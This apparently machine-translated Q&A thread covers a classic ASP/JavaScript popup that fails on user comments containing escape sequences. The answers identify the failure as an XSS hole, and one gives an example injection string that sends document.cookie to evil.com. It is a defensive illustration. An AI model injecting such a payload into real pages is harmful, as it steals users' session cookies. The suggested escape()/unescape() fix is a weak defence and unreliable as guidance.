我有以下问题。我有一个表单,用户可以输入一些数据。 有各种各样的用户,所以用户输入了转义序列(例如,text \ n text)。 此条目正在插入数据库。但是,用户可以单击按钮打开其中的弹出窗口 它显示提交评论。 除了那些包含转义序列的窗口外,所有窗口都可以顺利运行,不能打开它们。 这是一个带有java脚本的经典asp。有人有过类似的问题吗?也许charset有问题?
答案 0 :(得分:0)
你已经发现了XSS漏洞更加良性的问题。
你需要Javascript-escape字符串。
在有人进入");document.location = "http://evil.com/?cookie=" + document.cookie;//
答案 1 :(得分:0)
跟SLaks一起去:
在至少,使用escape(stringVariable)和unescape(stringVariable)对大多数特殊字符进行编码(以及稍后解码)以帮助防止XSS(代表跨站点脚本)。 SLaks的示例显示有人在复制任何现有cookie信息时注入恶意代码以将用户重定向到另一个站点。